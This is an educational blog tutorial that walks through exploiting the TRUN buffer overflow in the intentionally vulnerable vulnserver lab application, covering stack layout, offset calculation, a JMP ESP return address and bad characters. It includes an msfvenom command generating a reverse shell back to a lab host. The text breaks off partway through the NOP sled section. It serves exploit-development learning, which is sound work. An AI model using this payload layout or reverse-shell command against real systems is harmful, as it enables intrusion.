# Buffer Overflow - Explained

## Motivation

Buffer overflows have been covered by a lot of people in hundreds of writeups, videos and blogs. However, while teaching this subject to myself I often found phrases or explanations that left out important details, were immensely vague or even turned out to be straight up false.

Since I like to get into the details of how things work and *why* they work, I decided to share the entire manual process of dissecting one very common and basic buffer overflow.

For this I will use the vulnserver, specifically the `TRUN` command - starting from confirming the vulnerable entry point all the way up to spawning a reverse shell without taking any guesses.

{% hint style="info" %}
It is entirely up to you to use this resource supplementary or as a stand alone read.
{% endhint %}

If this is your first time ever reading about buffer overflows - or you just want a quick hands-on intro - maybe check out my [Final Notes](#practical-buffer-overflow-introductions) first. There you'll find some good YouTube tutorials with the typical and far more practical approach. Here we're all about the details.

## The Vulnserver

Introducing one of the most common applications used for practicing buffer overflows:

{% embed url="<https://github.com/stephenbradshaw/vulnserver>" %}
The Vulnserver
{% endembed %}

As stated in the description, this is an intentionally vulnerable application with the sole purpose of learning different sorts of buffer overflows. Here, we are going to concentrate on the most basic scenario that's built in to the `TRUN` command (one of the many commands the vulnserver offers upon connecting to it).

### Setup

Depending on whether you want to follow along you'll need some tools:

* [VMware](https://customerconnect.vmware.com/downloads/details?downloadGroup=WKST-PLAYER-1623-NEW\&productId=1039\&rPId=85399) or [VirtualBox](https://www.virtualbox.org/wiki/Downloads) for creating a virtual lab environment
  * Make sure to put both VMs in the same network - preferably NAT Network in VBox and NAT in VMware
* A virtual machine for the attacker - I'll use [Kali Linux](https://www.kali.org/get-kali/#kali-virtual-machines)
* A [windows virtual machine](https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/) for the target (I'll use Windows 11)
  * Once setup make sure to[ disable Real-time protection](https://support.microsoft.com/en-us/windows/turn-off-defender-antivirus-protection-in-windows-security-99e6004f-c54c-8509-773c-a4d776b77960)
  * Download vulnserver from <https://github.com/stephenbradshaw/vulnserver>&#x20;
    * You need at least the `essfunc.dll` and `vulnserver.exe` in the same directory
  * &#x20;[Process Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer) (Windows Sysinternals)
  * A hexeditor like [Hexinator](https://hexinator.com/hexinator-windows/)

### 32-bit Stack Basics

Before we start looking at any code or exploit I want to give a brief introduction to the 32-bit stack.

{% hint style="info" %}
This is not meant to be a comp-sci class. I'll assume some basic computer knowledge.
{% endhint %}

First of all, what and where is the stack?

The stack is a memory region located on the physical RAM in your computer. Simply speaking it's a "last-in-first-out" (LIFO) structure, responsible for storing any local variables that a function might need to remember or work with.&#x20;

In the image below you can see the location of the stack in a broad depiction of the entire memory.

![Basic layout of the 32-bit memory](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F2pB7dmgygf4SZ5F1rKvl%2F32-bit-Memory.png?alt=media\&token=c70b22fe-d49a-4104-8b4e-88e74fa87959)

Notice that the highest address is at the top (32 bits of '1' or 4 bytes 0xff) and the lowest address is at the bottom. We can also see that there is a free memory region below the stack that can be used to allocate more space when needed (for example when calling a new function). Keep in mind that the stack grows towards lower addresses -> meaning the stack grows **down**.

{% hint style="warning" %}
Always pay attention to the direction a stack is depicted by looking at the addresses. Some tools and resources reverse the layout and put the highest address at the bottom. Suddenly the stack "grows upwards" visually.
{% endhint %}

To avoid any confusion, following is an example of the stack and its memory addresses plus the terms I will use to reference the stack in the future. The "bottom of the stack" faces towards the highest address and the "top of the stack" (i.e. the last item that was pushed on it) is located towards the lowest address.&#x20;

{% hint style="info" %}
Yes, it's visually counter intuitive to name the lower address the top of the stack **but** logically it makes sense as we `push` to and `pop` from the *top*.
{% endhint %}

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FpR7aYxeBhaBZzCs8yLpl%2Fstackaddresses-on-32-bit-systems.png?alt=media\&token=164e6c20-5dd7-44d5-bfaf-a5a09b42dde6)

So how does the stack work and why is it important for us?

In addition to normal local variables a program will also save some meta values on the stack. These values help the program to keep track of things like "where do I return to when the current function ends" and "where are my arguments". And they are stored on the stack in a standardized way.

To be more explicit, I am talking about the contents of the (extended) base pointer (**EBP**) and the (extended) instruction pointer (**EIP**) registers that are both pushed on the stack whenever a function is called.&#x20;

The final register that'll be important for us is the (extended) stack pointer (**ESP**). Its content is always the lowest available stack address (i.e. it points to the top of the stack).

{% hint style="info" %}
If you don't feel familiar with the terms ESP, EIP and EBP I would advise you to do some basic research on those before continuing.
{% endhint %}

Let's break down the basic order in which the stack is being filled when a function is called:

1. The caller pushes any <mark style="color:yellow;">arguments</mark> it wants to pass to the callee on the stack
2. The content of the <mark style="color:red;">instruction pointer</mark> register (i.e. the address of the next instruction after the function call) is pushed on the stack
3. The content of the <mark style="color:green;">base pointer</mark> register is pushed by the callee
4. The <mark style="color:blue;">stack pointer</mark> is decreased by the amount of requested memory space for local variables (12 bytes in the example below) (remember *decreasing* the ESP means *increasing* the stack)

Below you can see an exemplary stack with fictional contents during a function call.&#x20;

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F5aM5x7SpMLvl0codDVtF%2Fregisters-on-32-bit-systems.png?alt=media\&token=6fbb0373-640c-4afb-a46d-7e2bae269f9b)

Let's try to examine that scenario.

The **EIP** points to the next instruction to be executed (0x77864A5C - the next instruction inside our current function).

The **EBP** points to the base of the current stack frame - basically it's an anchor to reference local variables easily - here we have 0x0060DF1C. At this memory address we also find the address of the previous frame pointer which we can later load back into to EBP register to restore the previous function scope.

At **EBP + 0x4** (4 bytes above the EBP) we find the instruction pointer that was saved when this function was called. When the current function ends this value will be loaded (`pop`'ed) back into the EIP and program execution will continue at this address.

At **EBP + 0x8** we can find a parameter that was passed to the current function: 0xDEADBEEF in little endian format.

{% hint style="danger" %}
If you have difficulties following along so far I can suggest this resource which describes the steps from above (and more) in way greater detail: <https://textbook.cs161.org/memory-safety/x86.html>.
{% endhint %}

Below the EBP we see 12 bytes that were allocated and the **ESP** pointing to the top of that space. In this example this buffer was filled with the string "ABCDEFGHIJKL" (we're viewing the hexadecimal representation of the ASCII values).&#x20;

{% hint style="warning" %}
Note that, since the stack works with the little endian format, an ASCII string like "ABCD" which in hexadecimal is 0x41 0x42 0x43 0x44 on the stack will be interpreted as the 32-bit value 0x44434241 when used as a pointer for example.
{% endhint %}

As you can see, the buffer starts at the lowest address and is being filled up continuously.

So what happens when we start writing more than 12 bytes into that buffer? We **overflow** it.

After overflowing the 4 bytes of the frame pointer that lies directly over the buffer we can also overwrite the return address. That would allow us to redirect the execution flow to anywhere we want as soon as the current function ends.

To conclude this introduction, here is a visual representation of what the basic idea of a buffer overflow looks like.

![(RIP in this scope must not be confused with the 64-bit version of the instruction pointer which is also called RIP.)](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F3jSa4QgwmCj4se7kIlLO%2Fbuffer-overflow-example.png?alt=media\&token=4dac561d-68f3-4f3c-9fbd-0ace16507fc7)

{% hint style="success" %}
With the theory at hand now let's dive into the practical part and examine the vulnserver.
{% endhint %}

### Locating the BOF

Let's look at the vulnserver. We know that for a buffer overflow to occur all we need is an unsafe way of writing an arbitrary amount of bytes to a buffer that's located on the stack.

Usually, finding such a potential vulnerability can be done by spiking the target application - but we'll try to identify the vulnerability manually (in the code) instead.

{% hint style="info" %}
Spiking is the process of testing an application with many different sorts of inputs in order to find a pattern that can cause a crash.
{% endhint %}

Using the manual approach obviously takes a lot longer because we have to look at the (decompiled) source code. But sooner or later we come across this `Function3`.

![Buffer overflow vulnerability in Function3 (decompiled code left and original source code on the right)](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2Fr9SOqY8F86ztyINBDpGb%2Ffunction-3.png?alt=media\&token=33e1ba86-f219-4a3d-b17b-7a7839e20fcd)

Regardless of whether we had decompiled the `.exe` or gained access to the source code - we can see that in `Function3` an array of unchecked length is copied into a buffer of a fixed length (2000 bytes as per the source code) using `strcpy`. Hence, if the input was larger than the target buffer (`Buffer2S`) we'd overflow it.

{% hint style="info" %}
In case you wondered about the destination size (2008 vs. 2000 bytes), we'll see Ghidras reason to display the 2008 in a second when we look at the disassembly.&#x20;
{% endhint %}

The [manpage](https://man7.org/linux/man-pages/man3/strcpy.3.html) even warns about the unsafe use of `strcpy` - and there doesn't seem to be any safety check in place. At least not in this function. So let's find out how we can trigger this function and whether we can control the input arbitrarily.

### Triggering the BOF

Looking at the function references we can quickly identify the only place where `Function3` is being called from. Once again, we can get this information from either the decompiled or source code.

![Decompiled and original code that calls the vulnerable Function3](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FtsEvgVmN8LH0fEEY3ESO%2Ftrun-handler.png?alt=media\&token=13c526e9-ed98-475f-9123-f8d9f9e621e1)

With a tiny bit of reverse engineering we can outline the following steps:

{% hint style="info" %}
The `RecvBuf` contains all the bytes that were sent to the server and will be named "input" from here on.
{% endhint %}

* First the input must start with the five characters `"TRUN "`&#x20;
* Then a buffer with 3000 elements is allocated and filled with zero (`TrunBuf`)
* If the input contains a `'.'` character anywhere starting from the 6th character
  * then the first up to 3000 bytes from the input are copied to `TrunBuf`
  * and `Function3` is called with `TrunBuf` as argument

The rest of the code clears `TrunBuf` and sends a hardcoded answer to the client but that's not important for us because we already got everything we need. Apparently we can cause the program to copy up to 3000 bytes of our input (that must start with at least `"TRUN ."`) into a buffer that's only \~2000 bytes large when `TrunBuf` is passed to `Function3`.

{% hint style="success" %}
We now combined the first couple of pieces to find a way of overflowing `Buffer2S`.
{% endhint %}

{% hint style="info" %}
To compare with usual tutorials, first you would have spiked the application to find that a large input containing a "`.`" can crash the `TRUN` command and subsequently you would have fuzzed\* the target to reveal that a length somewhere between 2000 and 3000 suffices.\
(\***Fuzzing** - sending inputs of increasing length until one causes a crash)
{% endhint %}

### Calculating the Offset

So far we know that a simple string like this: '`TRUN .' + 'X'*2994` (python syntax) would crash the target. (Remember that at most 3000 bytes are taken from our input so we don't have to bother sending any more than that.)

Actually, we can be fairly certain that a 2100 byte long input would also be enough. Since there were no other visible local variables in the vulnerable function, the EBP and RIP are likely to be very close to the buffer.

However, in order to write an exploit that overwrites the RIP with a precise value we are going to need the *exact* offset of the RIP to the buffer we are overflowing.

{% hint style="info" %}
This step is typically called "finding the offset" and describes the use of a unique pattern that is sent to the target. The attacker then uses a debugger to find the value in the EIP at the time of the crash and searches that sequence in the original pattern, thus finding the offset of the bytes that overwrite the RIP.
{% endhint %}

Although the debugger would be the faster choice and definitely easier to use when the code is more complex, let's see what happens under the hood of `Function3`. For this purpose we'll have a look at the disassembled code.

![Function3 disassembled (with radare2)](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FSNaquaxb0JgBgXyCp0WD%2Ffunction-3-disas.png?alt=media\&token=da648317-e037-4a51-9db2-8d92fbe840c5)

If you have never read assembly before this might look intimidating at first but we'll walk through it.

The very first line shows the label of this function (`_Function3`) and the argument that is passed: `arg_8h`. As we've seen in the source code already this is an address pointing to our input.

The following three lines list some references and their relative addresses (kind of like variables but not quite like that!).

1. The `char*` reference `dest` points at "base pointer - 0x7d8"

   (Remember the 2008 from Ghidra? Since there is literally no other size indication or boundary to this array, Ghidra assumed the size of that array to be 0x7d8 or decimal: 2008.)
2. The `char*` argument `arg_8h` references "base pointer + 0x8" (Remember the graphic from the stack introduction? - "base pointer + 4" is the RIP and "base pointer + 8" is an argument to the current function)
3. The `char*` reference `src` points at "stack pointer + 0x4". Derived from the call to `strcpy` and conveniently for us, the names `src` and `dest` already hint to what these addresses are going to be used for.

All the pointers might be hard to visualize in mind the first time, so we will draw the stack out in a second. But before we do that let's cover the first three instructions of this function - the "[prologue](https://en.wikipedia.org/wiki/Function_prologue_and_epilogue)" which basically initiates this function on the stack.

1. `push ebp`: Store the current contents of the base pointer register on the stack - just like we discussed in the stack intro. The [`push`](https://c9x.me/x86/html/file_module_x86_id_269.html) instruction will automatically decrease the stack pointer so that it shows at the top of the stack (to the last element that was pushed).
2. `mov ebp, esp` : Move the contents of the stack pointer to the base pointer register. Now both the EBP and the ESP point to the last item on the stack (which is the previous EBP value).
3. `sub esp, 0x7e8` : Subtract 0x7e8 (decimal: 2024) from the stack pointer, thus increasing the stack.

So currently the stack looks like this:

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FPGeuAOmVaQ9FeTtswpO0%2Fstack-layout-1.png?alt=media\&token=f6b8c1d4-d2e4-4dac-b720-c7df3a608931)

With the next four instructions we get the following layouts:

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F05Y3Qm1KlnVarZUkvUj0%2Fstack-layout-2.png?alt=media\&token=297f04bc-0cc0-4ce1-b819-ecadcd976799)

Basically, the pointer to our input buffer (the 3000 byte array) is now stored at 0x0060D72C.

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FOkyTT0ABr6S4muHZSaSG%2Fstack-layout-3.png?alt=media\&token=55a2d5be-85a6-44bc-b374-02cd2ea322a2)

And now we stored the address 0x060DF38 (that was previously labelled `dest`) at 0x0060D728.

Remember the references from the first three lines? The address that's now on the top of the stack (visual bottom) was referenced with `dest` and the value below the top was named `src`. That's because the next instruction is a `call` to the function `sym._strcpy` and we know that before we call a function we must push its arguments to the stack.

{% hint style="info" %}
As a side note, [x86 calling conventions](https://levelup.gitconnected.com/x86-calling-conventions-a34812afe097) state that the arguments to a function shall be pushed on the stack in reversed order. So the last argument to a function must be pushed first (lands at the higher address).
{% endhint %}

So when calling `strcpy(destination, source)` - indeed the value at the top of stack becomes the destination address and the value below that becomes the source address.

Leading us to the conclusion that we will copy up to 3000 bytes from our input to the address 0x0060DF38 in the example above. As a reminder, this means that starting from the address 0x0060DF38 we write characters to increasing addresses. After *offset* bytes we will start to write at the position of the saved instruction pointer. Finally, the offset to the RIP can be calculated easily:

"Address of the RIP" - "Start address of the overflowing buffer" = Offset

In our case that's 0x0060DF14 - 0x0060D738 = 2012 bytes.

{% hint style="info" %}
It doesn't matter what addresses we choose in our example because we only care about the distance between the two addresses.
{% endhint %}

{% hint style="success" %}
So now we succesfully calculated the exact amount of bytes that we need to put on the stack before we start overwriting the RIP: 2012.
{% endhint %}

(Of course we could've just taken the offset of the destination buffer immediately: ebp-0x7d8 and then add 0x4 to account for the ebp and we'd get the same result - but knowing the details of why that works was worth the long way in my opinion.)

### Finding a Path to Exploitation

So far we know exactly how to overwrite the return instruction pointer and have the option to put in any address that we like. But how do we choose which address to use?

{% hint style="info" %}
The goal now is to find a suitable return address - and that's most often done using [`mona.py`](https://github.com/corelan/mona) and [Immunity Debugger](https://www.immunityinc.com/products/debugger/). However, let's try to break down the steps that are made for us here.
{% endhint %}

Before investigating the overflow further we should check for any security measures. In principle, since the buffer overflow is a rather old vulnerability, executables can be protected in a lot of ways that each prevent or at least impede different exploitation techniques.

The most prominent protection mechanisms that are going to be important for us are Address Space Layout Randomization (**ASLR**) and Data Execution Prevention (**DEP**). Feel free to dig deeper into other mechanism as well but here I'll just focus on briefly covering these two.

#### Address Space Layout Randomization - [ASLR](https://en.wikipedia.org/wiki/Address_space_layout_randomization)

Without any protection enabled, a program that's being loaded into memory would always land at the exact same [virtual](https://en.wikipedia.org/wiki/Virtual_address_space) address. By being this predictable an adversay could easily calculate addresses of any instruction in that binary and use these in an overflow attack.

ASLR forces the memory addresses to be randomized - so the program will land at a different address each time it is loaded. Consequently, the attacker can not predict an address and will have a harder time finding a suitable one.

#### Data Execution Prevention - [DEP](https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention)&#x20;

DEP, also called NX (which stands for **N**o e**X**ecute), is a protection that prevents the CPU from executing any commands that reside in certain memory areas (such as the stack). If we were to attempt execution of commands placed inside our buffer on the stack while DEP is active - then our program would terminate with a memory access violation exception.

{% hint style="info" %}
Both measures have been around for quite some time and should be enabled whenever developing an application, especially when using a language like C.

Note that even when used together they could still be bypassed using some sort of address leak and return oriented programming - but that's out of scope here.
{% endhint %}

Coming back to the`vulnserver`, we can check an executable for enabled ASLR and DEP by inspecting the [PE headers](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#dll-characteristics). Below you'll find the output of a tool called [`winchecksec`](https://github.com/trailofbits/winchecksec) that extracts the relevant values and prints them.

![ASLR and DEP disabled on the vulnserver.exe](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F6v3EDNSb3HRMvTAKl9Dc%2Faslr-and-nx-disabled.png?alt=media\&token=506b35cb-6868-40b3-9d33-839044b80eea)

We notice that neither ASLR nor DEP (NX in this output) are enabled. Meaning that we:&#x20;

1. know where `vulnserver.exe` will be in memory and
2. are able to execute arbitrary code that we can put on the stack.

With that information we are ready to come up with a first plan for our exploit.

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F0ACAQM2nfQXkKUX31pSc%2Foverflow-scenarios.png?alt=media\&token=5b11ffed-1ad3-4467-85f1-c0f9f107a9a2)

Either we put our exploit code - remember our goal is to spawn a reverse shell, so from here on I'll refer to that *code* as **shellcode** - at the very beginning of our buffer or after the RIP. (We will ignore other techniques such as ROP for brevity here.)

However, in both scenarios the RIP should point to the start of the code - which is an address somewhere *on the stack*. While we know the address of any instruction in our executable, unfortunately we don't know the exact address of our overflown buffer on the stack.

{% hint style="info" %}
Although ASLR is disabled for the `vulnersver.exe`, each connection handler is spawned in a new thread via the `Kernel32.dll`, which does have ASLR enabled as we'll see in a bit, thus also [randomizing the stack address for the new thread](https://security.stackexchange.com/questions/18556/how-do-aslr-and-dep-work). &#x20;
{% endhint %}

Additionally, relying on a hardcoded stack address wouldn't be a very portable solution for an exploit anyway because the stack can depend on things like the OS version and environment.

So instead we'll be using another way to jump into the stack. To understand that technique, let's reiterate one more time over the exact contents of the stack and registers during runtime (feel free to skip ahead if you already know where I'm going with this, but for those new to the topic I hope that repeating the visualization of the stack might be useful).

![Feel free to compare with the graphics from "Calculating the Offset"](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FOe0kMYlarXXW0v0KwKRz%2Fexploit-flow-part-1.png?alt=media\&token=45353a32-1349-4cad-98a6-d092479757a1)

So far this graphic shouldn't be surprising. After the call to `strcpy` was made, we've overflown the buffer and overwritten the previous EBP and RIP values stored on the stack. What's important is the next instruction (EIP points to it) and the one after that. Let's see what these do:

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FJWXTdicnUVf8YgLeSBA1%2Fexploit-flow-part-2.png?alt=media\&token=aac3ed50-9bab-42cb-9205-db1f11a47588)

The [`leave`](https://c9x.me/x86/html/file_module_x86_id_154.html) instruction is responsible for cleaning up the allocated stack space of a function. It will revert the changes made to the ESP and point it to the current address stored in EBP, indicating that everything below that is now free stack space (it does not modify any values on the stack). In a second step the `leave` executes `pop EBP` which will load the value from the current top of the stack (expected to be the previous base pointer) into the EBP register and increment the ESP accordingly. Thus, after the `leave` and before the `ret` the ESP points to what should be the return instruction pointer.

The [`ret`](https://c9x.me/x86/html/file_module_x86_id_280.html) instruction will then cause a `pop EIP` causing the current value on the top of the stack to be loaded into the EIP register. Consequently, the next address at which execution would continue is 0x12121212 in this example. The `pop` also increases the ESP so that it continues to point at the top of the stack (right to what has previously been the function argument).

This may have been very verbose, but we've now learned that there is a **register that contains an address pointing directly to our buffer** (after the RIP value to be precise).

{% hint style="warning" %}
The reason we've looked at this particular step in detail is that some tutorials and guides talk about "overflowing the ESP", "writing to the ESP" or "the ESP containing shellcode" which is very misleading. The ESP is a *register* and it contains a 4 byte *address*!
{% endhint %}

Coming back to our task at hand, we may not know a stack address ourselves but we do know a register that contains the address required for exploit *Variant B* to work.

Combining this with our possibility to predict addresses of instructions in the vulnserver source code we can now make a new exploit plan that attempts to redirect execution to a `JMP ESP` instruction somewhere in our code. The `JMP ESP` will then casue the CPU to jump to the address stored in ESP which we know points to our shellcode.

![Path to exploitation via JMP ESP instruction](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FKmPczmPawptRVj6M4FVo%2Fexploit-path.png?alt=media\&token=de859ba7-4c89-4526-b413-6bce078072c4)

{% hint style="success" %}
It seems that all that's left to do is to find the address of a `JMP ESP` instruction somewhere in the `vulnserver` source code.&#x20;
{% endhint %}

We previously found out that we can predict any address of instructions in code segments due to disabled ASLR. But how exactly?

Let's dig a bit more into that statement. The default address for an executable in memory is 0x00400000 and [over here](https://devblogs.microsoft.com/oldnewthing/?p=43923) you'll find a great resource on the *why* for that. But more interestingly, you can confirm that yourself by looking at the base address during runtime.

{% hint style="info" %}
If you remember the memory layout from the introduction now you may notice the abstraction that I made. If it were to be made precise then the `text` segment should indeed start at 0x00400000 instead of 0x00000000.
{% endhint %}

For the purpose of viewing the active `vulnserver`, its libraries and their addresses we can use a windows sysinternal called [`Process Explorer`](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer). Below you can see a screenshot of that:

![Disabled protections on both the vulnserver.exe and the essfunc.dll](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2Fr06UgZKma3iSbvhcHfbz%2Fvulnserver-no-protections.png?alt=media\&token=9010a0a6-2b13-4503-aaa6-a031166c615b)

In the bottom pane, that lists loaded libraries and details about the `vulnserver` process, we can see a column called ASLR. You'll notice that ASLR is not only disabled for the `.exe` itself but also for a `.dll` (**d**ynamically **l**inked **l**ibrary) called `essfunc.dll` (it was part of the vulnserver download).

Most importantly though, we can see the *Image Base* addresses for these code regions. The `vulnserver.exe` does indeed reside at 0x00400000. Note that we can also write down the base address for the `essfunc.dll` (0x62500000) as it does equally serve as a pool of possible instructions for us to jump to with ASLR disabled.

{% hint style="success" %}
Knowing the base addresses of these code segments and knowing that they won't ever be randomized or changed we can search for instructions in these code segments and get their virtual address by adding their file offset to that base address.
{% endhint %}

To find a `JMP ESP` instruction in the `vulnserver.exe` we can't just simply search for a string because it's a binary file. It consists of the binary assembler commands for the CPU (amongst headers and other regions). Instead, one possible way of finding an instruction is to search for the corresponding opcode - the hexadecimal value of said instruction.

Using an [(online) assembler](https://defuse.ca/online-x86-assembler.htm#disassembly) or google we can quickly determine that the opcode for a `JMP ESP` instruction consists of the two bytes `0xFF 0xE4`. We can now use a simple hexeditor like [`hexinator`](https://hexinator.com/hexinator-windows) to open the `vulnserver.exe` and search for the byte sequence `FFE4`.

I'll save you a few seconds by telling you that you won't find any such sequence in the `vulnserver.exe` though. It just doesn't occur.

However, remember that we also have the `essfunc.dll` at our disposal. Opening it in our favorite hexeditor and searching for `FFE4` we get lucky.

![Finding a JMP ESP instruction in the essfunc.dll](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2Fg3XQs6ExWBfh6ZU7Ui27%2Fhexview-of-dll.png?alt=media\&token=25a588e8-7095-4a15-9e9f-dd6b1ed7d915)

Great, we found nine possible `JMP ESP` instructions (marked yellow)! Feel free to choose any one of them - I'll continue with the first one. And just as a reminder, yes, there are tools that can do all that and more *for* you.

Now to find the offset of that instruction one could be tempted to use the 0x5af that's displayed in the bottom left corner of the screenshot. And indeed, that's the offset of the instruction in this entire `.dll` file but, as mentioned before, the `.exe` and `.dll` consist of more than *just* code.

I went ahead and also marked the actual beginning of the code section inside the `.dll` with blue. So the code starts at 0x400 meaning that a file offset of 0x5af turns into a code offset of 0x1af.

This might seem like pulling a random hex number out of a hat at first, but referencing the [PE headers](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format) one more time and examining the actual headers of the `vulnserver.dll` with [`dumpbin`](https://docs.microsoft.com/en-us/cpp/build/reference/dumpbin-reference?view=msvc-170) we can see that every byte is accounted for:

![Extracted header values of the essfunc.dll](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FI0xXpyVjabMGVAEZeRvC%2Fdll-headers.png?alt=media\&token=576cf6cf-3b94-4cf2-adea-fad3b27afb34)

Firstly, we can see the image base address that we already saw in the Process Explorer. This is the address at which the `dll` will be loaded to. Secondly, we see the `base of code` being at an offset of 0x1000 - so the code section of the `dll` will start at 0x62501000 in memory. Finally, we also see the 0x400 (`size of headers`) that describe the offset of actual code in the `dll`.

Knowing these numbers we can continue to calculate the address at which the `JMP ESP` instruction is going to be in memory.

0x62500000 (base address) + 0x1000 (base of code) + 0x1AF (instruction offset in `.dll`) = **0x625011AF**.

{% hint style="success" %}
Finally, we successfully calculated a suitable return address to a `JMP ESP` instruction.

**0x625011AF**
{% endhint %}

Just to reiterate, with that information our plan for exploitation now looks like this:

`TRUN .`**`<`***`padding to the length of 2012`***`><`***`0x625011AF`***`><`***`shellcode`***`>`**

### Determining Bad Characters

Before we can start looking at the shellcode we have to check for what's generally called "bad characters". In essence, bad characters are bytes that may malform our final payload on the target.

{% hint style="info" %}
Comparing to the *normal* tutorial again, this step usually requires a trial and error sequence of sending all bytes (ranging from 0x00 to 0xFF) with a script and then observing the memory on the target to spot any differences.
{% endhint %}

Once we can look into the code though, we can deduce the bad characters manually. For this we simply follow the input buffer that contains the bytes we sent.

```c
Result = recv(Client, RecvBuf, RecvBufLen, 0);
```

First the `vulnserver` receives at most 4096 (`RecvBufLen`) raw bytes from the `Client` socket and stores them in `RecvBuf` (a byte array). This includes all bytes ranging from 0x00 to 0xFF.

Focusing on the `TRUN` command, the next line that will deal with the `RecvBuf` is one we've already looked at during the chapter "Triggering the BOF":

```c
strncpy(TrunBuf, RecvBuf, 3000);
```

Up to 3000 bytes from `RecvBuf` are copied into `TrunBuf`. From the [manpage for `strncpy`](https://linux.die.net/man/3/strncpy)we get that this function

> copies the string pointed to by *src*, including the terminating null byte ('\0'), to the buffer pointed to by *dest*.

So every byte after the first `0x00` will be discarded by this function. Thus, we can't have a `0x00` inside our payload before the shellcode ends!

The next step is the call to `Function3` and the unsafe use of `strcpy` which has the same null byte behavior. Other than that there are no manipulations on the input buffer for the `TRUN` command.

We can therefore conclude that the only bad character for our buffer overflow is the null byte.

{% hint style="info" %}
Other commands on the vulnserver (such as `LTER`) are a bit more restrictive and will manipulate the incoming bytes. You can view an example [here](https://www.ins1gn1a.com/identifying-bad-characters). Feel free to cross check with the source code to see how the other bad characters come to exist.
{% endhint %}

It's important to note that the bad characters must also be taken into account when choosing a return address. If our return address would include a 0x00 for example, we couldn't use it without ending our payload at that position. Luckily for us, 0x625011AF is without a null byte or we'd have to find a different address.

### Generating Shellcode

Moving on to the next step of our exploit creation. We got an offset, we got a `JMP ESP` instruction and we determined the bad characters. What's left to do is to create the shellcode and integrate it to our payload.

{% hint style="info" %}
This is not a course on shellcode nor would I have the expertise to write on any of that in detail. So we'll only have a short look on how to create some before disassembling the first few instructions in the next chapter.
{% endhint %}

There's many ways to go on about this part. We could google for common shellcode \[[1](https://shell-storm.org/shellcode/)]\[[2](https://packetstormsecurity.com/files/164131/Windows-x86-Reverse-TCP-Shellcode.html)]\[...] (at your own risk), actually learn exploit development and write our own \[[1](https://www.vividmachines.com/shellcode/shellcode.html)], or use a tool that does everything for us (how does that sound, *huh*?).

This is the moment where we'll blatantly copy what most tutorials demonstrate:

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=80 EXITFUNC=thread -b "\x00" -f py
```

Using `msfvenom` from the metsploit framework we are generating a non staged tcp reverse shell payload that will connect back to 10.0.2.15 (my Kali machine) on port 80. With `EXITFUNC=thread` we specify that our shellcode runs in a sub-thread and should not crash the application when this sub-thread ends. Lastly, we specify our one bad character to be omitted during generation with `-b` and set the output format to python with `-f py`.

![Generating the shellcode with msfvenom](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FV0kxNQiRkZyhMsxQQksG%2Fshellcode-generation.png?alt=media\&token=13f9da96-90f9-4df4-b3cc-e857af9d99ac)

Once we've got the shellcode as a sequence of bytes (raw instructions that will spawn our reverse shell on the target system) we can copy it for our final exploit payload.

### Building a NOP Sled

As we're slowly approaching the final phase, there is one more thing to add to our payload that's often being mistreated in my opinion. The NOP sled. Simply speaking, the [NOP](https://c9x.me/x86/html/file_module_x86_id_217.html) or no-op instruction is an instruction that has no effect on anything other than the EIP register. The CPU executes it without doing anything and continues at the next address.

{% hint style="info" %}
